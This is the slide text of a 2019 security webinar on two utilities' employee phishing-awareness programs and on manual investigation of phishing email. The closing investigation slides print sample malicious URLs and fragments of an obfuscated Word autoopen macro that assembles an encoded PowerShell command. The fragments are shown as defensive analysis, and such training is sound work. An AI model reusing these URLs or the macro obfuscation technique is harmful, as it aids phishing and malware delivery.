MRO Security Advisory Council (SAC) Webinar “A Tale of Two Phishing Programs” Seth Bross, Enterprise Security Analyst, OGE Energy Corporation Tammy Retzlaff, Consultant Information Security Analyst, American Transmission Company Jamie Arndt, Senior Cyber Security Engineer, American Transmission Company July 11, 2019
A Tale of Two Phishing Programs MRO Presentation July 11, 2019
ATC – Phishing Program Tammy Retzlaff, CISSP, CISM, CRISC Information Security Analyst atcllc.com
Who We Are • ATC was founded in 2001 as a transmission-only utility serving the Upper Peninsula of Michigan, the eastern half of Wisconsin, and a small portion of Illinois. • We manage almost10,000 miles of high-voltage transmission lines and 568 substations. • We have approximately 600 employees and 1800+/- contractors. atcllc.com 3
Where We’ve Been In 2012 malicious email attacks were increasing almost daily… – Employees unaware of the risk – Leaders unaware of the risk – No easy way to report suspected phishing emails – Email investigations difficult and time consuming • We knew we needed to do something … atcllc.com 4
How We Started • Looked for ways to train our employees on the dangers of phishing • Decided on the good behaviors we wanted to re-enforce • Researched tools where out there to help us • Gained buy-in from leaders atcllc.com 5
The Journey • 2012 – purchased a tool to help us “phish” our employees • 2013 – began running Monthly Scenarios – Immediate Education – Easy ways to report – Focus on Good behaviors – report, report, report • 2016 – Assessed the program from a Human Performance standpoint • 2017 - Corporate Goal – tied to bonus • 2018 – Made improvements to the program – In person conversations for repeat clickers – Retest for individuals who fell for the phish atcllc.com 6
Where We Are Today • Read and discuss opportunity for all employees • Quarterly prize drawings for reporters • Depts challenge each other • “Leader Board” • Catalyst to talk about security across the organization atcllc.com 7
Trends Reporting of phishing scenarios is trending upward Clicking on phishing scenarios is trending downward atcllc.com 8
Where We’re Going • Increasing difficulty of scenarios • Targeted scenarios in addition to monthly • Tighter tie-in with Human Performance atcllc.com 9
Lessons Learned • Leadership support of the program is key in its success • Focusing on positive behaviors gets better buy-in than focusing on negative behaviors • Partner with as many people in the organization as possible • Deliver your message in person as often as possible • Reinforce your message as often as possible atcllc.com 10
Internal Phishing Program Seth Bross, CISSP Systems Security Analyst 11
Company Overview • Founded in 1902 • Around 3000 active members • Our company works the entire electric stack from generation and transmission to distribution. 12
Phishing Program Overview • Every Member receives a simulated phishing email once a month • Training is provided in cases where a member falls for a simulated phishing email. • Training is provided through our phishing/training vendor automatically • Simulated phishing emails are from the vendor based on real phishing emails • All suspect emails reported are run through an automated verification system and responded to. 13
Benefits • Increased awareness of the types of emails that are phishy • More contact between the business and Security • Training can be provided immediately and can be tailored to issues • Reduce phishing attack surface • Increased contact with security 14
Automated Response to Submitted emails • By utilizing SOAR we have been able to reduce the man hours needed to respond to emails drastically. • Increased reporting capabilities • More insight into the effectiveness of our tools • The SOAR platform allows for some automated analysis that would normally require manual examination. 15
Forward Outlook • SOAR (Security Orchestration, Automation and Response) improvements • Increased the ability to integrate tools and use external input to increase automated response. • Reduce time needed to analyze and respond to emails • Further integrations with SOAR tools, email servers and End Point Protection Tools 16
Lessons Learned • Some people will feel “Tricked” when they fail a test and it can result in non-productive interactions. • Messaging must go out early and frequently to allow time for employees to understand the purpose of the tests and how they are used. • Make sure that the security tests are not used as a stick but as a training opportunity • Automate early, automate often 17
Simulated Phishing Email Example 18
Detection Evasion 19
Detection Evasion 20
Detection Evasion 21
ATC – Manual Investigation Jamie Arndt Senior Cybersecurity Engineer atcllc.com
Spam
Malicious URLs http://www.puynag-china.com/server/?email=[email here]
Malicious Documents https://luxur.club/wp-content/25ke-t65cr-eczyfts
Obfuscate ted m macros Sub autoopen() On Error Resume Next <snip> jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578) - fC_4AoA - Log(bAAABA - MAw1XQUA / WQkAZ1 - 258583782)) End If l_DDCAU (jAUUBx + "po" + FADAUk_ + "wersh" + QAAADDA + "ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA) If YQUw_U = UBoABkAk Then lAxAAAC = 210690210 * Round(342763755) / wDUoQAUB - Tan(557511061 + UADAAAZ) * 370351941 + Hex(304503937 + CSng(oBAkAUA)) <snip> End Sub
Obfuscate ted m macros Sub autoopen() On Error Resume Next <snip> jQ1AA14 = (NoBUxo / Log(i1o1_wDG) - CXA_QU * Oct(177462578) - fC_4AoA - Log(bAAABA - MAw1XQUA / WQkAZ1 - 258583782)) End If l_DDCAU (jAUUBx + " po " + FADAUk_ + " wersh " + QAAADDA + " ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA) If YQUw_U = UBoABkAk Then lAxAAAC = 210690210 * Round(342763755) / wDUoQAUB - Tan(557511061 + UADAAAZ) * 370351941 + Hex(304503937 + CSng(oBAkAUA)) <snip> End Sub
l_DDCAU (jAUUBx + " po " + FADAUk_ + " wersh " + QAAADDA + " ell -e " + YAGAAAQx + UAAcQACc + fACABAAX + dDZBAQoc + U4cADAxA + u_DAAGA) Function dDZBAQoc () <snip> SAAAkQAC = "LgAoACAAKABbAFMAVAByAGkAb . . .” <snip> bwcQAAAA = "tAGoATwBpAE4AJwAnACkAKAAgA . . .” <snip> dDZBAQoc = SAAAkQAC + bwcQAAAA + BAwAAoCA + . . . End Function
Recommend
More recommend